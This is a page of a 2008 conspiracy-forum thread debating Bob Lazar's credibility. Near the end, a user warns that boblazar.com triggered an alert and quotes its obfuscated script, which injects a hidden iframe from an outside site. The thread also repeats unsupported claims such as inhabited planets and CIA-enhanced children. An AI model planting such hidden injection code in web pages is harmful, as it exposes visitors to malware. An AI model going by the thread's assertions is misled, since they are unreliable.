It looks like you're using an Ad Blocker.

Please white-list or disable AboveTopSecret.com in your ad-blocking tool.

Thank you.

Some features of ATS will be disabled while you continue to use an ad-blocker.

Could Bob Lazar be who he says he is?

page: 5
<< 2  3  4    6  7  8 >>

join
share:

posted on Jan, 25 2008 @ 05:57 PM
link   
reply to post by Palasheea

There is no conspiracy to any of it....sorry. LOL

And I dont know any PIs who dug thru trash cans.

Im not going to devulge anything I dont feel I should. Just because I dont do the work now, doesnt mean I wont later.

Again, no conspiracy no matter how one tries to try and find one. I was using one example based on a previous poster asking about looking into educational records. Thats it

Anyways, this is way off topic of this thread. *moving on*

[edit on 25-1-2008 by greeneyedleo]

posted on Jan, 25 2008 @ 06:07 PM
link   
[edit on 25-1-2008 by Palasheea]

posted on Jan, 25 2008 @ 06:08 PM
link   
Has anyone stopped to ponder that perhaps Bob Lazar was a plant? what i mean by that is with all the experimenting that went on by the CIA like MK Ultra and so fourth that perhaps they discovered something when they tested him as a child? and they enhanced him?

It would be so easy to asign to him watchers and guides to follow his everyday life and remove paperwork deemed unessesary as time went on, maybe they knew what could happen and did these things as insurance in case he went rogue?

Think about it for a min or two and it does make sense to do this even some of the people who worked at MIT could have been agents assigned to protect their assets and he would never know, as for other students that could fit in also with some kind of hypnosis to not notice it has been done before.

And recent rumours of him at the pentagon in secret meeting means he has to be good at something? would he really know that was happening? how easy is it to cover up by day rather than cover up years? IMO

SPELLING

[edit on 25/1/2008 by azzllin]

[edit on 25/1/2008 by azzllin]

posted on Jan, 25 2008 @ 06:10 PM
link   

Originally posted by greeneyedleo
reply to post by Palasheea

Im not going to devulge anything I dont feel I should. Just because I dont do the work now, doesnt mean I wont later.
[edit on 25-1-2008 by greeneyedleo]

Uh huh, um....
Why am I thinking you really were not a PI?? Lol

[edit on 25-1-2008 by Palasheea]

posted on Jan, 25 2008 @ 06:13 PM
link   

Originally posted by buddhasystem

Originally posted by OSSkyWatcher
bob's current financial career is dependant on his physics and scientific knowledge

Then it must suck to be him because he exposed his ignorance if basics in nuclear physics on a few occasions, and on my memory, via at least two of his claims posted here by his medium, John Lear. One foobar was in the setup of the "experiment" where Bob was showing John the alleged piece of 115, and the other was in the voltage needed to deflect an alpha particle.

but since you've never seen either 3 in person you'd have 0 clue about element 115
same with me

and again you haven't said 1 word about how you would know lazars financial situation or if he borrows money from any one

you just make these claims

also with your grand scientific knowledge you have never linked 1 person to a study written by a scientist, you don't read?

i have a friend studying neuro science, he links me to studys about w/e i ask about and tells me to read for myself, unlike him i don't have to study it, i take the info i want and leave the rest

i can't even think of the term for these report papers, but you don't read any of them cause you have never linked 1 person to one

i talk to a soon to be real doctor

what do you want to know about your brain i will ask him tonight you can get your answer tomorrow probably with a report or two to read yourself

i know he will have a report or some .pdf formatted study on the subject you will ask because he's had to read them for school

you have no scientific studys to show anyone about element 115 you just argue with lear

but i guarantee if you asked him he'd come up with something to read before you

and to try and stay on topic unlike buddah Question there is a lot of lazar interviews and trancsripts on the web, i have posted as much proof as anyone can in regards to physical pieces of evidence linking him to his past

he was at los alamos, and the navy paid him in 1989

he also drives a hydrogen powered car, and is going to be selling the kits to convert your own car soon

so once we get confirmation of this invention we will know for sure he's smart enough to work at a secret lab

[edit on 25-1-2008 by OSSkyWatcher]

*i believe the term is case studys, where are you physics case studys for element 115

or anything else for that matter if you "visit" los alamos

posted on Jan, 25 2008 @ 06:15 PM
link   

Originally posted by LAUGHING-CAT
To claim he is a fraud because he produced no results the rest of us will consider is conceit. Consider this; if we were to provide the Wright Bros. prints and schematics of a WWI bi-plane could they have built one? Of course not.

I disagree with both parts of your statement. Bob did produce results. And the small part of those that has to do with nowadays physics is bogus. The "experiment" he allegedly showed to John is one instance. The inevitability of proton bombardment at sea level (which he was apparenly unaware of, while concocting his tall tales) would also mean a small but quite detectable anti-matter output (if we believe Bob at all). I mean when he tries to "do physics", he just miserably fails.

Now, about the planes... I think that Messrs. Wright would be perfectly capable of figuring it out. As a matter of fact, if you showed a WWI plane to Lenardo da Vinci, he would have gotten this down cold even 500 years ago.

posted on Jan, 25 2008 @ 06:30 PM
link   

Originally posted by DarkWanderer
If you worked on a Top Secret project your records of attendance and graduation would be destoryed. Straight away.

To get a clearance to Top Secret level requires that you HAVE A BACKGROUND THAT CAN BE CHECKED. And it has to be re-checked so you requalify regularly. You are getting security work mixed up with something off some terrible television show or something.

When your background can't be checked, or when you have a criminal conviction (spent or unspent), associations with foreign nationals or people open to question by the people carrying out the checks- you're in trouble.

Don't try and find ways to explain away the inconsistencies. Look at them closely. All this crapola is distracting from the other witnesses from Area 51 for example. Checking up on them is easier since they have never contradicted themselves, but also less exciting because they have never made such outlandish claims.

posted on Jan, 25 2008 @ 06:33 PM
link   
reply to post by johnlear

I wouldn't mind living on the Earths moon but forget about Venus.
It's too hot!
I great hiding spot would be a very large space station on the other
side of the sun. That would make it 186 million miles away from Earth.
If you looked right at, you would be looking at the sun.

posted on Jan, 25 2008 @ 06:33 PM
link   
actually the higher you go the more they have to know, there is a thread about top secret clearances here and a few people here have them

the more you know the easier it would be to whipe it all out, at least that is the first thing i thought when reading that thread originally, will try to link it right now so you can see what i mean by the more you know the more they know about you

they want to know everything

and people forget money always talks lol

posted on Jan, 25 2008 @ 06:34 PM
link   

Originally posted by Grey Basket
reply to post by johnlear

I'll go out on a limb and open up a can of worms here...

Where's your proof of that outrageous statement? Without it, you are spreading lies and should be banned for it.

Second that emotion to quote Futurama.

There is no proof of any of it that doesn't originate with unreliable third parties. Some of whom may be telling the truth. You would be better off, if interested, googling eg Val Thor, Billy Meier, George Adamski and while you are at it NASA, JPL, Venus surface temperature and looking at independent scientific measurements and astronomical observations.

There are many strange things, even in lives as short as ours, but getting deceived and disinformed will only leave you sad and confused. Start your own revolution of thought and dig into the subject, minus the bafflegab of the ever-unpopular John Lear.

posted on Jan, 25 2008 @ 06:39 PM
link   

Originally posted by Eurisko2012
I great hiding spot would be a very large space station on the other
side of the sun. That would make it 186 million miles away from Earth.
If you looked right at, you would be looking at the sun.

Yeah, but the Earth's orbit is elliptical, not circular, so unless you had a way to speed it up or slow it down, there would always be places in the orbit where you'd "poke out" from the other side of the Sun and those nosy astronomers would see you.

posted on Jan, 25 2008 @ 06:44 PM
link   
reply to post by buddhasystem

Bob Lazar is the real deal.
Just check out his company at United Nuclear.
Great science stuff and even great wallpaper jpegs.
Science needs to be fun.
United Nuclear is just that.
I like their periodic table poster.

posted on Jan, 25 2008 @ 06:52 PM
link   

Originally posted by johnlear
Originally posted by DogHead

When one of his milder posts claims an Earth-like Venus- not just the interior as a hollow world but the surface too now- then something really odd and disturbing is orbiting John Lear. And it smell like roses would grow well in it.

Dogheads post is a little unclear. Let me explain.

All planets and most satellites have cavernous interiors. No, they are not hollow as such. Just cavernous.

All planets in our solar system are inhabited by beings like ourselves. But they are much more advanced both socially and technologically.

Earth is kept in a war-like state by the military-industrial/NAZA/DoD complex who feel that aliens (the grays) are a threat. They are prepared to either eliminate the aliens (the grays) or eliminate us to deny the aliens (the grays) Earth.

And the MI/NAZA/DoD have a weapon that can do that very easily.

"Like ourselves"? I don't think so. You can pay for info and tipoffs, but there are other ways of finding things out that are secret. Believe that. ---------------PC

posted on Jan, 25 2008 @ 07:08 PM
link   

Originally posted by spacevisitor
Hi Question, my answer to your question is, yes its very plausible that Bob Lazar is who he say he is.
Because why would he not?

Didn't we already discuss this, SpaceVisitor?

Even you agreed there is something fishy about his story.

Not to mention his "knowledge" of physics and science..

Maybe he himself even believes what he's saying. I've seen people like that. But the probability of him being the real deal..

I would run out of characters before putting enough zeros after the decimal point..

Why would he not? What does that proove?

When i was younger, i used to ask myself, why would these people lie.. So i believed them.. But i was judging from myself.

posted on Jan, 25 2008 @ 07:21 PM
link   

Originally posted by Incarnated
The likelyhood of it being a reality is cut down dramaticlly.

Wow!

I never thought we would ever actually agree on something...

I wonder how long it will last.

posted on Jan, 25 2008 @ 07:36 PM
link   
"what he is saying about hydrides on his site is correct"

so bob lazar knows about hydrides IMO

again if anyone wants to question my soon to be dr. friend about his field of science feel free to U2U me to your hearts desire, but he says he thinks bob knows about hydrides

www.switch2hydrogen.com...

LAZAR IS ENDING THE NEED FOR OIL

and people question his scientific credentials? so what if he even has the paper it doesn't change the fact that he either stole this technology from a secret lab, or made it himself

that's something you NEED to know about bob lazar, and his brain

and unless he's going to hoax everyone about his hydrogen fuel system and just say "well it was a fake hydrogen tank...nothing in it"

posted on Jan, 25 2008 @ 07:46 PM
link   
Nuclear Dreamland

My vote is currently for Bob Lazar as precocious lab technician and "wheels within wheels" David Ferrie to John Lear's LH Oswald. In other words a disinformation conduit so arrogant he couldn't believe that he was being manipulated by those less intelligent (albeit far more gainfully employed) than him. His original testimony was interesting, and I guess in the spirit of answering "sure, why not" to questions the legend has grown from there.

None of which explains the truly dizzying heights of lunacy Lear asks people to scale on a daily basis.

posted on Jan, 25 2008 @ 07:56 PM
link   
Nuclear Dreamland
Area 51 and Bob Lazar
by Doc Hambone

and Mr.Hambone is credible?

posted on Jan, 25 2008 @ 08:01 PM
link   

Originally posted by Grey Basket
I was surprised to see that his old website is no longer password protected, this is the first time I have been in:
www.boblazar.com...

Questions for John Lear:

1) Do you still talk to Bob?
2) Why has he never tried to prove his MIT background? Seems like a bad time to disappear, what's the point of releasing all this info only to be laughed into hiding...
3) If you do speak to him, can you ask him to give ATS a day of questioning with him or something?

I clicked the boblazar link and my security settings alerted me to an active x alert which showed "remote data services data control" wanted to run on my pc.

Than I look at the source code for the index page and at the end of the html is this suspicious encrypted script code:

document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f \u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002d\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002e\u0063\u006f\u006d\u002f\u0074\u 006f\u0070\u0031\u0030\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u006 5\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064\u0065\u006e\u003b\ u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u00 61\u006d\u0065\u003e\u0020')

I believe a login script to a SQL database would be the first code set to be parsed from the top of the page.

posted on Jan, 25 2008 @ 08:03 PM
link   

Originally posted by OSSkyWatcher
www.unitednuclear.com...

mars image bob has up on his site

maybe there is something in it for people to see, not me though, mikesingh or zorgon or someone else

just interesting to see which picture bob has up and if there is anything in the pic

Nothing much to see, except all the green algae around the base of the rocks

Seriously, does anyone know if that's the correct color balance?

top topics

<< 2  3  4    6  7  8 >>

join